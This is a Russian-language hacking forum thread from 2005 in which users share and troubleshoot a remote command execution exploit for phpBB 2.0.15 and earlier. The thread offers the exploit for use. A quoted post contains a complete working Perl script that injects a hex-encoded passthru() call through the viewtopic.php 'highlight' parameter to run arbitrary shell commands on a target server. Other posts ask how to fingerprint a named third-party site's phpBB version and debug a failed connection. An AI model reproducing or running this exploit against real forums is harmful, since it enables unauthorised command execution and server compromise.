Форумы Уязвимости форумов phpbb 2.0.15

earnest · 3 Aug 2005

phpBB <= 2.0.15 remote command execution exploit
by Captain Crunch Security TeaM // www.ccteam.ru or ccteam.nukleon.us
Thanks to nukleon, nori, r57. This programm just for fun! Coded by tristram.
############################################################
Usage:

c99expl.phpbb2015-interactive.php [NUM] [CMD] params: [URL] -...меня не выдает список? вроде экс. работает...

bogusz · 4 Aug 2005

Не подскажите точную версию...уже запарился перебирать =\
http://www.taultunleashed.com/phpbb2

GoRiLLa · 4 Aug 2005

phpBB 2.0
The phpBB Group : 2002

bogusz · 4 Aug 2005

GoRiLLa said:

phpBB 2.0
The phpBB Group : 2002
Click to expand...

То что это 2.0 то я понял \=) вот какая это 2.0.*...13, 14, 15 , 16...вот в этом вопрос.

Loo · 4 Aug 2005

bogusz
исходи из того, что версия до 2.0.3 =)
т.к. в 2002 году вышло только 2.0.0, 2.0.1, 2.0.2 и 2.0.3 =)

kamui · 10 Aug 2005

Green_Bear said:

по многочислеым просьбам трудящихся:

Code:

#!/usr/bin/perl

use IO::Socket;

## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

if (@ARGV < 4)
 {
 print q(############################################################
     phpBB <=2.0.15 remote command execution exploit
        by RusH security team // www.rst.void.ru
	Littttttttttle modificated by nori!
		r57 respect!
############################################################
 usage:
 
r57phpbb2010.pl [URL] [DIR] [NUM] [CMD]
 params:
  [URL] - server url e.g. www.phpbb.com
  [DIR] - directory where phpBB installed e.g. /phpBB/ or /
  [NUM] - number of existing topic
  [CMD] - command for execute e.g. ls or "ls -la" 
############################################################
 );   
 exit;
 }

$serv  = $ARGV[0];
$dir   = $ARGV[1];
$topic = $ARGV[2];
$cmd   = $ARGV[3];

$serv =~ s/(http:\/\/)//eg;
print "*** CMD: [ $cmd ]\r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";

$cmd=~ s/(.*);$/$1/eg;
$cmd=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$topic=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;

$path  = $dir;
$path .= 'viewtopic.php?t=';
$path .= $topic;
$path .= '&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20';
$path .= $cmd;
$path .= '%3B%20%65%63%68%6F%20%5F%45%4E%44%5F';
$path .= '&highlight=%27.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%27';

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-] CONNECT FAILED\r\n";

print $socket "GET $path HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";

$on = 0;

while ($answer = <$socket>)
{
if ($answer =~ /^_END_/) { print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n"; exit(); }
if ($on == 1) { print "  $answer"; }
if ($answer =~ /^_START_/) { $on = 1; }
}

print "[-] EXPLOIT FAILED\r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";

### EOF ###

все спасибо ввиде повышения репутации

Click to expand...

дОБРОЕ ВРЕМЯ СУТОК!Не подскажите,в чем дело?
после ввода выдает:

*** CMD: [ [ls -la] ]
~~~~~~~~~~~~~~~~
[-] CONNECT FAILED

Форумы Уязвимости форумов phpbb 2.0.15

earnest New Member

bogusz New Member

GoRiLLa New Member

bogusz New Member

Loo New Member

kamui New Member

Useful Searches

Форумы Уязвимости форумов phpbb 2.0.15

earnest New Member

bogusz New Member

GoRiLLa New Member

bogusz New Member

Loo New Member

kamui New Member